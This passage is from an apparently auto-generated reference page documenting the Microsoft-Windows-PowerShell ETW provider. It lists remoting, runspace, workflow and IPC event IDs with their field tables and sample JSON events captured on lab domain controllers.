"ErrorMessage": "Connecting to remote server 10.2.10.21 failed with the following error message : The WinRM client cannot process the request. Default authentication may be used with an IP address under the following conditions: the transport is HTTPS or the destination is in the TrustedHosts list, and explicit credentials are provided. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. For more information on how to set TrustedHosts run the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.",
"StackTrace": ""
},
"message": ""
}
Event ID 32785: Runspace Id param1.
#Description
Runspace Id param1. Establishing a connection using WSMan Create Shell.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32785,
"version": 1,
"level": 4,
"task": 0,
"opcode": 10,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T05:29:54.150+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0008-D88F-818753F0DC01}"
},
"execution": {
"process_id": 5004,
"thread_id": 10052
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": ""
},
"message": "win:None"
}
Event ID 32786: Runspace Id param1.
#Event ID 32787: Runspace Id: RunspaceId.
#Event ID 32788: Runspace Id: RunspaceId.
#Event ID 32789: Runspace Id: Runspace_Id Pipeline Id: Pipeline_Id.
#Description
Runspace Id: Runspace_Id Pipeline Id: Pipeline_Id. Sending data of size SessionId.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString | |
DataSize UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32789,
"version": 1,
"level": 4,
"task": 0,
"opcode": 21,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.128+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 7116
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"DataSize": "2480",
"PipelineId": "ba938c13-e497-4b6f-8de6-08b164dd5a82",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32790: Runspace Id: Runspace_Id Pipeline Id: Pipeline_Id.
#Description
Runspace Id: Runspace_Id Pipeline Id: Pipeline_Id. Callback received for WSManSendShellInputEx.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32790,
"version": 1,
"level": 4,
"task": 0,
"opcode": 12,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.126+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 7116
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"PipelineId": "00000000-0000-0000-0000-000000000000",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32791: Runspace Id: Runspace_Id Pipeline Id: Pipeline_Id.
#Event ID 32792: Runspace Id: Runspace_Id Pipeline Id: Pipeline_Id.
#Description
Runspace Id: Runspace_Id Pipeline Id: Pipeline_Id. Received Data of size SessionId.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString | |
DataSize UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32792,
"version": 1,
"level": 4,
"task": 0,
"opcode": 22,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.022+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 7116
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"DataSize": "223",
"PipelineId": "00000000-0000-0000-0000-000000000000",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32793: Runspace Id SessionId Pipeline Id PipelineId.
#Description
Runspace Id SessionId Pipeline Id PipelineId. Establishing a command connection using WSManRunShellCommandEx.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32793,
"version": 1,
"level": 4,
"task": 0,
"opcode": 12,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.127+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 8196
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"PipelineId": "ba938c13-e497-4b6f-8de6-08b164dd5a82",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32800: Runspace Id SessionId Pipeline Id PipelineId.
#Description
Runspace Id SessionId Pipeline Id PipelineId. Callback received for command connection.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32800,
"version": 1,
"level": 4,
"task": 0,
"opcode": 12,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.128+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 7116
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"PipelineId": "ba938c13-e497-4b6f-8de6-08b164dd5a82",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32801: Runspace Id: Runspace_Id Pipeline Id SessionId.
#Description
Runspace Id: Runspace_Id Pipeline Id SessionId. Closing transport for command.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32801,
"version": 1,
"level": 4,
"task": 0,
"opcode": 13,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.131+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 9420
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"PipelineId": "ba938c13-e497-4b6f-8de6-08b164dd5a82",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32802: Runspace Id: Runspace_Id Pipeline Id SessionId.
#Description
Runspace Id: Runspace_Id Pipeline Id SessionId. Callback received for command close.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32802,
"version": 1,
"level": 4,
"task": 0,
"opcode": 13,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.131+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 7116
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"PipelineId": "ba938c13-e497-4b6f-8de6-08b164dd5a82",
"SessionId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569"
},
"message": "win:None"
}
Event ID 32803: Runspace Id: Runspace_Id Pipeline Id SessionId.
#Event ID 32804: Runspace Id: Runspace_Id Pipeline Id SessionId.
#Event ID 32805: Runspace Id: SessionId.
#Event ID 32849: Runspace Id: Runspace_Id Pipeline Id: Pipeline_Id.
#Description
Runspace Id: Runspace_Id Pipeline Id: Pipeline_Id. Server is sending data of size TargetInterface to client. DataType: Runspace_InstanceId TargetInterface: PowerShell_InstanceId.
Message #
Fields #
| Name | Description |
|---|---|
Runspace_InstanceId UnicodeString | |
PowerShell_InstanceId UnicodeString | |
DataSize UnicodeString | |
DataType UInt32 | Known values
|
TargetInterface UInt32 | 3 to client. DataType. |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32849,
"version": 1,
"level": 4,
"task": 0,
"opcode": 21,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.022+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0000-F6D5-7F8753F0DC01}"
},
"execution": {
"process_id": 15220,
"thread_id": 4892
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"DataSize": "223",
"DataType": 65538,
"PowerShell_InstanceId": "00000000-0000-0000-0000-000000000000",
"Runspace_InstanceId": "00000000-0000-0000-0000-000000000000",
"TargetInterface": 1
},
"message": "win:None"
}
Event ID 32850: Request param1.
#Event ID 32851: Reporting context for request: ReportingContextForRequest Context Reported: ReportingContextForRequest.
#Description
Reporting context for request: ReportingContextForRequest Context Reported: ReportingContextForRequest.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString | |
param2 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32851,
"version": 1,
"level": 4,
"task": 0,
"opcode": 12,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T05:29:54.158+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0001-EB9A-828753F0DC01}"
},
"execution": {
"process_id": 5004,
"thread_id": 19268
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": "System.Management.Automation.Remoting.Client.WSManNativeApi+WSManPluginRequest",
"param2": "System.Management.Automation.Remoting.Client.WSManNativeApi+WSManPluginRequest"
},
"message": "win:None"
}
Event ID 32852: Reporting operation complete for request: ReportingOperationCompleteForRequest.
#Description
Reporting operation complete for request: ReportingOperationCompleteForRequest.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString | |
param2 UnicodeString | |
param3 UnicodeString | |
param4 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32852,
"version": 1,
"level": 4,
"task": 0,
"opcode": 11,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T05:29:54.150+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0008-D88F-818753F0DC01}"
},
"execution": {
"process_id": 5004,
"thread_id": 10052
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": "System.Management.Automation.Remoting.Client.WSManNativeApi+WSManPluginRequest",
"param2": "NoError",
"param3": "",
"param4": ""
},
"message": "win:None"
}
Event ID 32853: Shell Context param1.
#Description
Shell Context param1. Request Id param2. Creating a commonad session for running a command.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString | |
param2 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32853,
"version": 1,
"level": 4,
"task": 0,
"opcode": 12,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T05:29:54.150+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0008-D88F-818753F0DC01}"
},
"execution": {
"process_id": 5004,
"thread_id": 10052
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": "",
"param2": "CreateCommand: Create a new command in the shell context completed"
},
"message": "win:None"
}
Event ID 32854: Shell Context param1 Command Context param2 Request Id param3.
#Event ID 32855: Shell Context param1 Command Context param2 Request Id param3.
#Description
Shell Context param1 Command Context param2 Request Id param3. Received data from client.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString | |
param2 UnicodeString | |
param3 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32855,
"version": 1,
"level": 4,
"task": 0,
"opcode": 10,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T05:29:54.161+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0008-D88F-818753F0DC01}"
},
"execution": {
"process_id": 5004,
"thread_id": 10052
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": "",
"param2": "PerformWSManPluginReceive: Invoked",
"param3": ""
},
"message": "win:None"
}
Event ID 32856: Shell Context param1 Command Context param2 Request Id param3.
#Description
Shell Context param1 Command Context param2 Request Id param3. Client sent a receive request so that server can send data.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString | |
param2 UnicodeString | |
param3 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32856,
"version": 1,
"level": 4,
"task": 0,
"opcode": 10,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T05:29:54.161+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0008-D88F-818753F0DC01}"
},
"execution": {
"process_id": 5004,
"thread_id": 10052
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": "",
"param2": "EnableShellOrCommandToSendDataToClient: unlock the shell / command specified so that the shell / command starts sending data to the client.",
"param3": ""
},
"message": "win:None"
}
Event ID 32857: Shell Context param1 Command Context param2 IsReceiveOperation param3.
#Event ID 32865: Loading assembly param1 for custom shell with shell Id param2.
#Event ID 32866: Loading type param1 for custom shell with shell Id param2.
#Event ID 32867: Received remoting fragment.
#Description
Received remoting fragment.
Message #
Fields #
| Name | Description |
|---|---|
ObjectId Int64 | |
FragmentId Int64 | |
sFlag Int32 | Known values
|
eFlag Int32 | Known values
|
FragmentLength UInt32 | |
FragmentPayload UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32867,
"version": 1,
"level": 5,
"task": 0,
"opcode": 22,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:47.999+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0000-F6D5-7F8753F0DC01}"
},
"execution": {
"process_id": 15220,
"thread_id": 4892
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"FragmentId": 0,
"FragmentLength": 752,
"FragmentPayload": "0x0200000002000100F80C45E3FDEBC74497D8B6C7C3DA856900000000000000000000000000000000EFBBBF3C4F626A2052656649643D2230223E3C4D533E3C56657273696F6E204E3D2270726F746F636F6C76657273696F6E223E322E333C2F56657273696F6E3E3C56657273696F6E204E3D22505356657273696F6E223E322E303C2F56657273696F6E3E3C56657273696F6E204E3D2253657269616C697A6174696F6E56657273696F6E223E312E312E302E313C2F56657273696F6E3E3C4241204E3D2254696D655A6F6E65223E414145414141442F2F2F2F2F415141414141414141414145415141414142785465584E305A57307551335679636D567564464E356333526C62565270625756616232356C424141414142647458304E685932686C5A455268655778705A32683051326868626D646C63773174583352705932747A54325A6D63325630446D316663335268626D5268636D524F5957316C446D31665A47463562476C6E6148524F5957316C417741424152785465584E305A573075513239736247566A64476C76626E4D755347467A61485268596D786C43516B434141414141414141414141414141414B436751434141414148464E356333526C62533544623278735A574E30615739756379354959584E6F644746696247554841414141436B78765957524759574E3062334948566D567963326C76626768446232317759584A6C6368424959584E6F5132396B5A56427962335A705A47567943456868633268546158706C4245746C65584D47566D46736457567A41414144417741464251734948464E356333526C62533544623278735A574E30615739756379354A51323974634746795A58496B55336C7A644756744C6B4E766247786C593352706232357A4C6B6C4959584E6F5132396B5A56427962335A705A475679434F78524F4438414141414143676F444141414143514D414141414A424141414142414441414141414141414142414541414141414141414141733D3C2F42413E3C2F4D533E3C2F4F626A3E",
"ObjectId": 17,
"eFlag": 1,
"sFlag": 1
},
"message": "win:None"
}
Event ID 32868: Sent remoting fragment.
#Description
Sent remoting fragment.
Message #
Fields #
| Name | Description |
|---|---|
ObjectId Int64 | |
FragmentId Int64 | |
sFlag Int32 | Known values
|
eFlag Int32 | Known values
|
FragmentLength UInt32 | |
FragmentPayload UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32868,
"version": 1,
"level": 5,
"task": 0,
"opcode": 21,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.022+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0000-F6D5-7F8753F0DC01}"
},
"execution": {
"process_id": 15220,
"thread_id": 4892
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"FragmentId": 0,
"FragmentLength": 202,
"FragmentPayload": "0x01000000020001000000000000000000000000000000000000000000000000000000000000000000EFBBBF3C4F626A2052656649643D2230223E3C4D533E3C56657273696F6E204E3D2270726F746F636F6C76657273696F6E223E322E333C2F56657273696F6E3E3C56657273696F6E204E3D22505356657273696F6E223E322E303C2F56657273696F6E3E3C56657273696F6E204E3D2253657269616C697A6174696F6E56657273696F6E223E312E312E302E313C2F56657273696F6E3E3C2F4D533E3C2F4F626A3E",
"ObjectId": 1,
"eFlag": 1,
"sFlag": 1
},
"message": "win:None"
}
Event ID 40961: PowerShell console is starting up
#Description
PowerShell console is starting up.
Message #
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 40961,
"version": 1,
"level": 4,
"task": 4,
"opcode": 1,
"keywords": 0,
"time_created": "2026-06-13T05:24:19.4248057+00:00",
"event_record_id": 164809,
"correlation": {
"ActivityID": "{AA583517-FAF4-0001-143A-58AAF4FADC01}"
},
"execution": {
"process_id": 7180,
"thread_id": 7184
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-c.cell-c.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {},
"message": "PowerShell console is starting up"
}
Event ID 40962: PowerShell console is ready for user input
#Description
PowerShell console is ready for user input.
Message #
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 40962,
"version": 1,
"level": 4,
"task": 4,
"opcode": 2,
"keywords": 0,
"time_created": "2026-06-13T05:24:20.0746353+00:00",
"event_record_id": 164811,
"correlation": {
"ActivityID": "{AA583517-FAF4-0001-143A-58AAF4FADC01}"
},
"execution": {
"process_id": 7180,
"thread_id": 7184
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-c.cell-c.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {},
"message": "PowerShell console is ready for user input"
}
Event ID 45057: Tracing ErrorRecord.
#Description
Tracing ErrorRecord.
Message #
Fields #
| Name | Description |
|---|---|
Message UnicodeString | [Exception Details] Message. |
Category UnicodeString | |
Reason UnicodeString | |
TargetName UnicodeString | |
FullyQualifiedErrorId UnicodeString | [Tracing ErrorRecord] FullyQualifiedErrorId. |
ExceptionMessage UnicodeString | |
ExceptionStackTrace UnicodeString | |
ExceptionInnerException UnicodeString |
Event ID 45058: Exception: Message: Message StackTrace: StackTrace InnerException : InnerException.
#Event ID 45060: Tracing Job: Id: Id InstanceId: InstanceId Name: Name Location: Location State: State Command: Command.
#Description
Tracing Job.
Message #
Fields #
| Name | Description |
|---|---|
Id UnicodeString | [Tracing Job] Id. |
InstanceId UnicodeString | [Tracing Job] InstanceId. |
Name UnicodeString | [Tracing Job] Name. |
Location UnicodeString | [Tracing Job] Location. |
State UnicodeString | [Tracing Job] State. |
Command UnicodeString | [Tracing Job] Command. |
Event ID 45061: Trace Information.
#Description
Trace Information.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 45061,
"version": 1,
"level": 4,
"task": 0,
"opcode": 0,
"keywords": "0x2000000000000000",
"time_created": "2026-06-02T04:29:47.998+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0000-F6D5-7F8753F0DC01}"
},
"execution": {
"process_id": 15220,
"thread_id": 4892
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"param1": "OutOfProcessUtils.ProcessElement : PS_OUT_OF_PROC_DATA received, psGuid : 00000000-0000-0000-0000-000000000000"
},
"message": "win:None"
}
Event ID 45062: Connection Paramters are Connection URI: Connection_URI Resource URI: Resource_URI User: User OpenTimeout: OpenTimeout IdleTimeout: IdleTimeout CancelTimeout: CancelTimeout AuthenticationMechanism:...
#Description
Connection Paramters are.
Message #
Fields #
| Name | Description |
|---|---|
uri UnicodeString | |
shell UnicodeString | |
userName UnicodeString | |
opentimeout UnicodeString | |
idletimeout UnicodeString | |
canceltimeout UnicodeString | |
auth UInt32 | Known values
|
thumbPrint UnicodeString | |
redircount UnicodeString | |
recvdDataSize UnicodeString | |
recvdObjSize UnicodeString |
Event ID 45063: Workflow plugin loaded.
#Event ID 45064: Workflow execution started.
#Event ID 45065: Workflow state changed.
#Event ID 45072: Workflow plugin has been requested for a shutdown.
#Event ID 45073: Workflow plugin restarted.
#Event ID 45074: Workflow is resuming.
#Event ID 45075: A quota limit that was set for the endpoint was exceeded.
#Event ID 45076: Workflow has resumed.
#Event ID 45078: Workflow runspace pool was created.
#Event ID 45079: Activity was queued for execution.
#Event ID 45080: Activity execution started.
#Event ID 45081: Workflow is being imported from a XAML file.
#Event ID 45082: Workflow has been imported from a XAML file.
#Event ID 45083: Workflow could not be imported from a XAML file because of an error.
#Event ID 45084: Workflow validation started.
#Event ID 45085: Workflow validation succeeded.
#Event ID 45086: Workflow validation failed with error.
#Event ID 45087: Workflow activity validated.
#Event ID 45088: Workflow activity could not be validated.
#Event ID 45089: Activity execution failed.
#Event ID 45090: Runspace availability changed.
#Event ID 45091: Runspace state changed.
#Event ID 45092: Workflow loaded for execution.
#Event ID 45093: Workflow unloaded.
#Event ID 45094: Workflow execution cancelled.
#Event ID 45095: Workflow execution aborted.
#Event ID 45096: Workflow cleanup operation executed.
#Event ID 45097: Persisted workflow loaded from disk.
#Event ID 45098: Workflow data was deleted from disk.
#Event ID 45100: Starting remove job.
#Event ID 45101: Job state changed.
#Event ID 45102: Job error.
#Event ID 45104: Job created for workflow (child job).
#Event ID 45105: Parent job created for workflow.
#Event ID 45106: All required jobs were created for workflow execution.
#Event ID 45107: Child job removed for workflow.
#Event ID 45108: An error occurred while removing job.
#Event ID 45109: Loading workflow for execution.
#Event ID 45110: Workflow execution finished.
#Event ID 45111: Cancelling workflow execution.
#Event ID 45112: Aborting workflow execution.
#Event ID 45113: Unloading workflow.
#Event ID 45114: Forced workflow shutdown started.
#Event ID 45115: Forced workflow shutdown finished.
#Event ID 45116: An error occurred while forcefully shutting down a workflow.
#Event ID 45117: Persisting workflow to disk.
#Event ID 45118: Workflow persisted to disk.
#Event ID 45119: Activity execution finished.
#Event ID 45120: Workflow execution error.
#Event ID 45121: A new PowerShell endpoint was registered.
#Event ID 45122: Endpoint configuration modified.
#Event ID 45123: Endpoint configuration unregistered.
#Event ID 45124: Endpoint configuration disabled.
#Event ID 45125: Endpoint configuration enabled.
#Event ID 45126: Out of process runspace started.
#Event ID 45127: Parameter splatting was performed during workflow execution.
#Event ID 45128: Workflow engine started.
#Event ID 45129: Workflow manager instantiated with CheckpointPath: CheckpointPath ConfigProviderId: ConfigProviderId UserName: UserName Path: Path.
#Event ID 46337: BEGIN ImportWorkflowCommand::StartWorkflowApplication.
#Event ID 46338: END ImportWorkflowCommand::StartWorkflowApplication.
#Event ID 46339: BEGIN Creating new job in ImportWorkflowCommand::StartWorkflowApplication.
#Event ID 46340: END Creating new job in ImportWorkflowCommand::StartWorkflowApplication.
#Event ID 46341: END Creating new job in ImportWorkflowCommand::StartWorkflowApplication.
#Event ID 46342: BEGIN JobLogic ContainerParentJob Guid WorkflowJobJobInstanceId.
#Event ID 46343: END JobLogic ContainerParentJob Guid WorkflowJobJobInstanceId.
#Event ID 46344: BEGIN WorkflowExecution ContainerParentJob Guid WorkflowJobJobInstanceId.
#Event ID 46345: END WorkflowExecution ContainerParentJob Guid WorkflowJobJobInstanceId.
#Event ID 46346: WorkflowJob with Guid WorkflowJobInstanceId added to ContainerParentJob with Guid ContainerParentJobInstanceId.
#Event ID 46347: ProxyJob with Guid ProxyJobInstanceId associated with remote ContainerParentJob with Guid ContainerParentJobInstanceId.
#Event ID 46348: BEGIN Execution of ContainerParentJob with Guid ContainerParentJobInstanceId.
#Event ID 46349: END Execution of ContainerParentJob with Guid ContainerParentJobInstanceId.
#Event ID 46350: BEGIN Execution of Proxy Job with Guid ProxyJobInstanceId.
#Event ID 46351: END Execution of Proxy Job with Guid ProxyJobInstanceId.
#Event ID 46352: BEGIN StateChanged event handler for Proxy Job with Guid ProxyJobInstanceId.
#Event ID 46353: END StateChanged event handler for Proxy Job with Guid ProxyJobInstanceId.
#Event ID 46354: BEGIN StateChanged event handler for Proxy Child Job with Guid ProxyChildJobInstanceId.
#Event ID 46355: END StateChanged event handler for Proxy Child Job with Guid ProxyChildJobInstanceId.
#Event ID 46356: BEGIN Running garbage collection
#Description
BEGIN Running garbage collection.
Message #
Event ID 46358: Persistence store has reached its maximum specified size
#Description
Persistence store has reached its maximum specified size.
Message #
Event ID 49153: Trace Information.
#Event ID 53249: Scheduled Job ScheduledJobDefName started at StartTime.
#Event ID 53250: Scheduled Job ScheduledJobDefName completed at StopTime with state State.
#Event ID 53251: Scheduled Job Exception Message.
#Event ID 53504: Windows PowerShell has started an IPC listening thread on process: param1 in AppDomain: param2.
#Description
Windows PowerShell has started an IPC listening thread on process: param1 in AppDomain: param2.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString | Windows PowerShell has started an IPC listening thread on process. |
param2 UnicodeString | in AppDomain. |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 53504,
"version": 1,
"level": 4,
"task": 111,
"opcode": 10,
"keywords": 0,
"time_created": "2026-06-13T14:08:49.4178649+00:00",
"event_record_id": 168240,
"correlation": {
"ActivityID": "{DFAAFF10-0837-4168-B0A2-798638094318}"
},
"execution": {
"process_id": 7864,
"thread_id": 7432
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-c.cell-c.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"param1": "7864",
"param2": "DefaultAppDomain"
},
"message": "Windows PowerShell has started an IPC listening thread on process: 7864 in AppDomain: DefaultAppDomain."
}
Event ID 53505: Windows PowerShell has ended an IPC listening thread on process: param1 in AppDomain: param2.
#Event ID 53506: An error has occurred in Windows PowerShell IPC listening thread on process: param1 in AppDomain: param2.
#Event ID 53507: Windows PowerShell IPC connect on process: param1 in AppDomain: param2 for User: param3.
#Event ID 53508: Windows PowerShell IPC disconnect on process: param1 in AppDomain: param2 for User: param3.
#Provenance
Where this provider's schema came from, and which Windows build it was observed on. Windows can change a provider's event schema between builds, so use this to judge whether it matches the build you collect from.
ETW provider GUID {A0C1853B-5C40-4B15-8766-3CF1C58F985A}
Defined in PSEvents.dll, which carries the event manifest.
Observed on:
